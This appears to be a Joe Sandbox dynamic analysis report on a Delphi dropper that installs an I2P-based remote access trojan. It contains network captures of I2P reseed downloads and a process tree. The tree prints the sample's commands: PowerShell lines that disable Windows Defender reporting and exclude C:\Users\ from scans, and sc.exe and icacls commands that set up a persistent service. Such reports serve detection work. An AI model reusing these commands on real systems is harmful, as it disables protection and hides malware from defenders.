2025-01-11 19:26:26 UTC	406	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 19:26:25 GMT Content-Type: application/octet-stream Content-Length: 67276 Connection: close Content-Disposition: attachment; filename=i2pseeds.su3 Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
2025-01-11 19:26:26 UTC	15978	IN	Data Raw: 49 32 50 73 75 33 00 00 00 06 02 00 00 10 00 14 00 00 00 00 00 01 04 80 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 31 37 33 36 35 39 33 39 39 33 00 00 00 00 00 00 72 65 73 65 65 64 40 64 69 76 61 2e 65 78 63 68 61 6e 67 65 50 4b 03 04 14 00 08 00 08 00 87 58 2b 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 79 46 64 67 37 4d 45 68 55 33 44 68 41 35 42 41 56 34 65 39 4b 4b 33 36 4f 69 73 54 46 41 68 75 42 54 74 4e 49 72 7a 32 78 35 55 3d 2e 64 61 74 55 54 05 00 01 2e 50 82 67 2a 89 ea 6d f9 a1 62 f3 4e eb dc 96 d5 7d 17 f3 2d 4b c4 ce 77 56 b8 6a 57 65 04 25 58 ed 8d f3 aa b4 34 f5 3c e0 b6 f2 ee 9a e7 cf ef 44 86 7d ff 17 13 c5 c1 ef 67 aa 58 bb a4 d9 59 21 e7 47 98 a1 c4 a8 3c 7e 79 c1 49 21 4a 6e 53 b7 8b 1c 17 Data Ascii: I2Psu31736593993reseed@diva.exchangePKX+Z;routerInfo-yFdg7MEhU3DhA5BAV4e9KK36OisTFAhuBTtNIrz2x5U=.datUT.Pg*mbN}-KwVjWe%X4<D}gXY!G<~yI!JnS
2025-01-11 19:26:26 UTC	16384	IN	Data Raw: 22 b7 9f 28 36 1c 80 ae 85 34 cb b0 0c 24 85 09 81 e8 20 c5 02 9e a7 20 c9 91 13 b4 17 48 e0 39 92 e7 01 23 ec 57 a1 e9 fe 6a 29 3a 0a 3d b9 d2 f0 46 a6 da 7a c0 b2 bd d5 d0 a6 c3 35 47 0f 8d 82 5f d7 61 2b cd 8d d9 55 67 5a c5 35 7f ab 02 7b 63 52 c5 81 5c 5e bc fc a5 b9 bc ea 12 5e 3c 40 04 64 00 f8 f7 4e 5d 41 10 0c 33 27 de 13 8b 9d 86 98 f4 ed b8 6c ed f1 5b 7d 3b b6 cc cc aa 1f ac fb 8a 6d 44 76 dd 8e 23 94 80 90 13 6f fe 8b a4 05 83 d8 ee 47 88 a0 00 05 c5 99 fe fe 35 33 b4 fb 91 1b f8 e8 2a 90 11 32 2c 25 46 fe dd e6 43 ca 6d fa d6 4f da 33 ef 3c b5 70 ee fa ad c2 c7 a7 be 4e ef dc 79 6c b7 39 f7 b8 b4 b9 b8 75 f1 d5 f3 a7 2f 3e b7 fb cd dc e0 c6 8f 4e bd 75 0b 7c e1 33 fc 5b ff f0 97 9f 9a 97 ee 1a 7c 71 e8 f7 00 00 00 ff ff 50 4b 07 08 9e 98 c3 Data Ascii: "(64$ H9#Wj):=Fz5G_a+UgZ5{cR\^^<@dN]A3'l[};mDv#oG53*2,%FCmO3<pNyl9u/>Nu\|3[\|qPK
2025-01-11 19:26:26 UTC	16384	IN	Data Raw: 0c 08 2d f5 28 72 76 75 a9 f2 f5 34 77 f3 88 88 f4 cd b3 74 2e 4b 0d b5 b5 66 29 c8 2f 2a b1 65 35 32 37 b6 30 b4 66 2c b6 d5 71 0d 4f cd 35 33 09 f0 0d 76 b6 8c f2 2e f5 72 f7 4d b7 48 f1 cb 08 77 0d f6 c9 f0 f4 70 f1 0e 2d f3 2f 2b 2a c9 ac 08 4a 34 f6 b5 b5 66 2c b3 65 34 b2 46 73 e2 7c 34 27 4a 1a 25 1a 18 5a 99 a4 59 58 19 19 18 58 99 98 18 19 5b 19 80 a1 d1 c0 38 97 1b e6 5c 56 bf 10 e7 00 23 86 32 5c 21 29 61 5e e7 ec 68 60 56 65 91 e7 57 91 91 16 6a 1a 92 5e ec 6c 19 94 6e 8b c5 19 c9 8e 15 89 ba 61 2e 4e a6 29 91 ae a6 5e 29 19 65 a6 25 59 ba c9 85 a1 99 ba 61 be e5 05 59 ae a5 51 91 46 89 be a1 1e 55 ee f9 b8 9c d1 44 4c 68 d1 d6 49 0c 0c 49 90 b8 63 8e 48 0b b2 66 cd 4b 2d f1 4c 01 89 8b e4 a5 96 a4 24 e9 65 e7 e5 97 e7 f9 a4 26 16 a7 06 a7 96 Data Ascii: -(rvu4wt.Kf)/e5270f,qO53v.rMHwp-/+J4f,e4Fs\|4'J%ZYXX[8\V#2\!)a^h`VeWj^lna.N)^)e%YaYQFUDLhIIcHfK-L$e&
2025-01-11 19:26:26 UTC	16384	IN	Data Raw: 2f 11 fa 70 f0 fc 66 f9 37 1b 75 85 72 9e 1b 2e 73 d4 90 4b d6 73 5a 64 ab 77 c9 ee f2 f6 80 e3 56 3b f5 b6 57 54 5e 8a f9 67 3f 6b c6 32 96 e0 87 bc 8c 32 ff aa 8f b4 be d9 f6 b5 62 92 df f1 03 69 eb 7f 57 c8 4d 99 ff ad f6 b4 eb b4 6d c5 3f a7 4b 8b 84 af dd da fa 24 f8 f2 a5 87 6b 12 b6 d6 6e d8 50 19 1e b6 ab e1 e5 37 e5 29 22 13 9e 5a 46 6c 0a 69 7f 39 77 c6 bf d2 ec cd 3d 4b 0b 3a 5b ae 07 7a ef 6d fd cc e4 fd ed 9d dd a4 13 15 97 6c af fb 0b 5b 7d 13 65 db db dc cb b9 da b1 7d 73 fb 5c 89 b6 ad 17 6b 3b 1e 5f 69 f3 3a f7 5f 75 5f 43 bd c8 c2 cd 2f 1e 56 7d 7e dd de c5 5c d7 e2 79 78 c3 97 49 47 85 97 06 48 6c 57 d8 b8 e4 55 fa c6 8c 95 96 42 1a 9a ee be cd d7 c4 6e 24 fd b3 3a b2 55 75 ea a6 57 2f 4e f6 6a 64 2c fd f7 74 a3 9e 08 73 d0 66 fb af 4d Data Ascii: /pf7ur.sKsZdwV;WT^g?k22biWMm?K$knP7)"ZFli9w=K:[zml[}e}s\k;_i:_u_C/V}~\yxIGHlWUBn$:UuW/Njd,tsfM
2025-01-11 19:26:26 UTC	2146	IN	Data Raw: 75 6f 3d 2e 64 61 74 55 54 05 00 01 e4 50 82 67 50 4b 01 02 14 00 14 00 08 00 08 00 89 59 2b 5a f1 b9 5f e3 1d 02 00 00 33 04 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 75 b7 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 50 77 70 38 55 58 66 38 5a 52 62 2d 73 55 45 58 33 51 49 62 59 52 54 74 33 53 73 6a 79 66 72 44 36 46 43 6f 4e 49 6c 42 7a 6f 6b 3d 2e 64 61 74 55 54 05 00 01 12 52 82 67 50 4b 01 02 14 00 14 00 08 08 08 00 e8 58 2b 5a ac b9 86 d8 3a 03 00 00 f4 05 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 04 ba 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 57 2d 79 56 5a 50 6a 41 67 59 45 36 48 34 62 59 4a 41 76 34 55 78 4e 7e 48 41 36 79 5a 35 49 6c 4d 63 73 7a 30 7e 62 30 6f 73 30 3d 2e 64 61 74 55 54 05 00 01 e4 50 82 67 50 4b 01 02 14 00 14 00 08 08 08 Data Ascii: uo=.datUTPgPKY+Z_3;urouterInfo-Pwp8UXf8ZRb-sUEX3QIbYRTt3SsjyfrD6FCoNIlBzok=.datUTRgPKX+Z:;routerInfo-W-yVZPjAgYE6H4bYJAv4UxN~HA6yZ5IlMcsz0~b0os0=.datUTPgPK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	50035	159.223.194.171	443	7008	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 19:27:40 UTC	101	OUT	GET https://reseed.onion.im:443/i2pseeds.su3 HTTP/1.0 User-Agent: Wget/1.11.4 Connection: close
2025-01-11 19:27:40 UTC	370	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 19:27:40 GMT Content-Type: application/octet-stream Content-Length: 70505 Connection: close Content-Disposition: attachment; filename=i2pseeds.su3 X-Ratelimit-Limit: 4 X-Ratelimit-Remaining: 3 X-Ratelimit-Reset: 900 Strict-Transport-Security: max-age=63072000; includeSubdomains; X-Frame-Options: DENY
2025-01-11 19:27:40 UTC	16014	IN	Data Raw: 49 32 50 73 75 33 00 00 00 06 02 00 00 10 00 12 00 00 00 00 00 01 11 1f 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 31 37 33 36 34 36 33 35 35 33 00 00 00 00 00 00 6c 61 7a 79 67 72 61 76 79 40 6d 61 69 6c 2e 69 32 70 50 4b 03 04 14 00 08 00 08 00 6a a0 29 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 6c 61 4d 56 4d 79 52 71 33 53 6f 55 4f 43 58 43 36 74 34 43 78 4e 63 46 64 66 6c 65 58 46 30 77 6e 67 56 53 59 4d 54 4d 4e 4b 49 3d 2e 64 61 74 55 54 05 00 01 89 2b 80 67 32 33 5e d3 95 d3 dc be 2c fc 46 8f f9 07 81 9f a5 36 d2 9f 85 2e 7e 7d 2d c2 12 77 e8 db bd 6f 2b 4b 5b b5 bb df e6 5e 7c d1 15 2c 12 b3 2a 27 e6 26 27 57 b5 a3 e7 da e2 5b c7 76 8b f9 3c 70 9f aa 30 7f 54 1e bf 3c fb bf 26 d5 e8 84 6e 1d e9 d9 e6 Data Ascii: I2Psu31736463553lazygravy@mail.i2pPKj)Z;routerInfo-laMVMyRq3SoUOCXC6t4CxNcFdfleXF0wngVSYMTMNKI=.datUT+g23^,F6.~}-wo+K[^\|,*'&'W[v<p0T<&n
2025-01-11 19:27:40 UTC	16384	IN	Data Raw: 2b 03 00 00 50 4b 03 04 14 00 08 00 08 00 09 9e 29 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 31 71 64 51 42 6d 5a 45 4a 6f 63 52 45 62 36 6c 42 53 34 75 70 58 47 71 43 77 50 50 69 6d 78 67 64 52 30 4c 62 67 2d 68 44 74 67 3d 2e 64 61 74 55 54 05 00 01 02 28 80 67 5a 14 7e de 95 ff 5d 49 f0 85 73 06 d7 16 7e 64 8a 2c 99 ee 3f 55 f7 e2 c4 a3 39 ff 77 fb b7 fe ef d4 6f 5f 5b f1 93 33 e2 b4 78 b2 e6 fe b3 79 ec ba 6f 56 f5 fd 9c 19 3d 9f b1 42 a3 5c e3 aa c0 aa 35 6b 46 e5 f1 cb 6b 88 ee 7a 34 59 2f 2c 58 73 81 bb b8 ec ed 20 86 db 39 21 36 8e d3 4f ce e3 ce 7b 2a d7 11 bc e5 2c 2b 03 0b 03 3b 03 0b 03 03 e3 14 9f 39 5e 22 4c cc 0c 50 c0 ea 17 e2 1c 60 c4 50 ce 92 91 5f 5c 62 cb 67 68 61 a1 67 68 6a a0 67 6e a6 67 64 Data Ascii: +PK)Z;routerInfo-1qdQBmZEJocREb6lBS4upXGqCwPPimxgdR0Lbg-hDtg=.datUT(gZ~]Is~d,?U9wo_[3xyoV=B\5kFkz4Y/,Xs 9!6O{*,+;9^"LP`P_\bghaghjgngd
2025-01-11 19:27:40 UTC	16384	IN	Data Raw: a2 e2 cc fc 3c 5b 36 03 3d 4b 3d 53 73 eb cc d9 76 52 85 c5 66 ff 45 8c f2 1c c3 44 9c ef 56 e4 d6 af 2c fb 1d f1 9f 65 e5 e6 28 06 2b 95 6f 27 dc bf d5 57 a8 1e 5a f0 33 62 a6 a9 b5 55 b9 75 c6 85 4b f5 ed 3b e6 a8 19 7a 67 4d 5a 52 22 cb 04 08 00 00 ff ff 50 4b 07 08 fd 82 95 fd df 01 00 00 2e 03 00 00 50 4b 03 04 14 00 08 00 08 00 14 97 29 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 50 75 6b 57 35 53 54 6d 4c 73 34 56 74 50 51 7a 4a 63 53 69 68 45 47 74 56 74 50 54 71 33 6f 6a 45 53 66 69 52 35 41 6e 70 4d 55 3d 2e 64 61 74 55 54 05 00 01 e9 1b 80 67 f2 0f 08 61 ff ed 2d e5 18 f7 79 ba 27 43 cf 92 14 b5 37 fc 4f b8 ca 64 f8 a6 3b f0 2a ab f2 4c ad 5b 7e df b4 52 70 f9 af a4 4d 5e 57 96 cd 7a 92 dd 5a f3 2d 69 75 Data Ascii: <[6=K=SsvRfEDV,e(+o'WZ3bUuK;zgMZR"PK.PK)Z;routerInfo-PukW5STmLs4VtPQzJcSihEGtVtPTq3ojESfiR5AnpMU=.datUTga-y'C7Od;*L[~RpM^WzZ-iu
2025-01-11 19:27:40 UTC	16384	IN	Data Raw: 98 f0 c9 47 c6 ad 70 b3 91 f8 cb 95 cd 35 3e b7 04 9f fd 56 ff fb fb 6a c8 c3 e6 9e f7 c1 eb e5 5d 96 da 2f 09 57 8c cf 94 09 ed 63 65 60 61 60 67 60 61 60 60 9c e2 23 53 54 c0 c4 cc 00 05 ac 7e 21 ce 01 46 0c e5 2c 19 f9 c5 25 b6 7c 86 e6 16 7a 46 c6 26 7a e6 e6 7a 86 86 c6 d6 8c 99 b6 12 65 11 66 55 41 41 e6 3e 16 79 59 11 99 e9 45 95 5e 19 a1 b9 9e e5 b6 b6 d6 2c 05 f9 45 25 b6 ac 86 86 c6 a6 c6 d6 8c c5 b6 3a 06 51 a1 e5 45 41 2e 25 15 25 01 ee a9 c1 55 49 61 21 59 ba 29 06 59 45 55 9e 95 d9 a9 86 ba b9 e5 4e 3e 2e ae 1e 3e ba 69 d9 16 b6 d6 8c 65 b6 8c 46 d6 1c 30 77 b0 04 07 87 1a 31 4c 65 49 4e 2c 28 b6 65 72 72 b6 c6 e9 20 9d 72 5f 5d 5f 9f a2 dc 2a 93 90 88 8a d4 9c ec c2 dc d2 92 cc b0 92 3c 8f e4 a4 12 0b 0f ef 32 d3 8c dc 74 f3 9c 74 ff f2 3c Data Ascii: Gp5>Vj]/Wce`a`g`a``#ST~!F,%\|zF&zzefUAA>yYE^,E%:QEA.%%UIa!Y)YEUN>.>ieF0w1LeIN,(err r_]_*<2tt<
2025-01-11 19:27:40 UTC	5339	IN	Data Raw: 68 38 63 3d 2e 64 61 74 55 54 05 00 01 94 23 80 67 50 4b 01 02 14 00 14 00 08 00 08 00 af 9a 29 5a 06 86 54 d3 35 04 00 00 8d 04 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 60 6d 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 78 41 49 74 58 32 48 6e 5a 49 75 47 6b 34 75 57 4e 37 70 54 58 34 64 7a 52 50 71 66 6d 64 73 56 70 61 67 43 32 32 62 4e 4d 4e 77 3d 2e 64 61 74 55 54 05 00 01 ba 21 80 67 50 4b 01 02 14 00 14 00 08 00 08 00 8c 9c 29 5a f0 cb b4 1a 2a 02 00 00 93 04 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 07 72 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 57 4b 66 71 45 45 71 34 32 53 56 71 74 55 7a 61 4a 2d 5a 55 5a 4e 51 70 49 38 71 59 31 48 2d 78 39 53 31 34 42 6c 41 65 62 67 77 3d 2e 64 61 74 55 54 05 00 01 39 25 80 67 50 4b 01 02 14 00 14 00 08 00 Data Ascii: h8c=.datUT#gPK)ZT5;`mrouterInfo-xAItX2HnZIuGk4uWN7pTX4dzRPqfmdsVpagC22bNMNw=.datUT!gPK)Z*;rrouterInfo-WKfqEEq42SVqtUzaJ-ZUZNQpI8qY1H-x9S14BlAebgw=.datUT9%gPK

Target ID:	0
Start time:	14:26:00
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\80P.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\80P.exe"
Imagebase:	0x400000
File size:	13'431'296 bytes
MD5 hash:	F0CFD22855EE0CF1935A36EA32F15138
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:26:00
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\80P.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\80P.exe
Imagebase:	0x400000
File size:	13'431'296 bytes
MD5 hash:	F0CFD22855EE0CF1935A36EA32F15138
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	14:26:04
Start date:	11/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\vlvy6qwtf6rg470fegk71sh09imwbh3.bat"
Imagebase:	0x7ff7e3600000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:26:04
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:26:04
Start date:	11/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:26:07
Start date:	11/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:26:09
Start date:	11/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:26:17
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe"
Imagebase:	0x7ff65ce50000
File size:	10'669'056 bytes
MD5 hash:	2F829F1CB631D234C54F2E6C6F72EB57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 70%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:26:20
Start date:	11/01/2025
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Imagebase:	0x7ff6f3100000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:26:20
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:26:20
Start date:	11/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc.exe stop RDP-Controller
Imagebase:	0x7ff77e8b0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:26:20
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:26:21
Start date:	11/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Imagebase:	0x7ff77e8b0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:26:21
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	14:26:21
Start date:	11/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Imagebase:	0x7ff77e8b0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	14:26:21
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	14:26:21
Start date:	11/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc.exe start RDP-Controller
Imagebase:	0x7ff77e8b0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:26:21
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	14:26:21
Start date:	11/01/2025
Path:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Imagebase:	0x7ff6bfd60000
File size:	89'088 bytes
MD5 hash:	BB070CFBD23A7BC6F2A0F8F6D167D207
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_I2PRAT, Description: Yara detected I2PRAT, Source: 00000014.00000002.2556948586.0000013B440BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 70%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	14:26:21
Start date:	11/01/2025
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Imagebase:	0x7ff741d20000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	14:26:21
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	14:26:21
Start date:	11/01/2025
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl
Imagebase:	0x7ff741d20000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	14:26:21
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	14:27:15
Start date:	11/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	14:27:15
Start date:	11/01/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -pss -s 436 -p 4124 -ip 4124
Imagebase:	0x7ff6561e0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	14:27:15
Start date:	11/01/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 4124 -s 1232
Imagebase:	0x7ff6561e0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	14:27:38
Start date:	11/01/2025
Path:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Imagebase:	0x7ff6bfd60000
File size:	89'088 bytes
MD5 hash:	BB070CFBD23A7BC6F2A0F8F6D167D207
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_I2PRAT, Description: Yara detected I2PRAT, Source: 0000001F.00000002.2934870565.00000201EAE17000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Function 02EA9CF6 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 02EAA053
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 02EAA059
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 02EAA05F

Memory Dump Source

Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

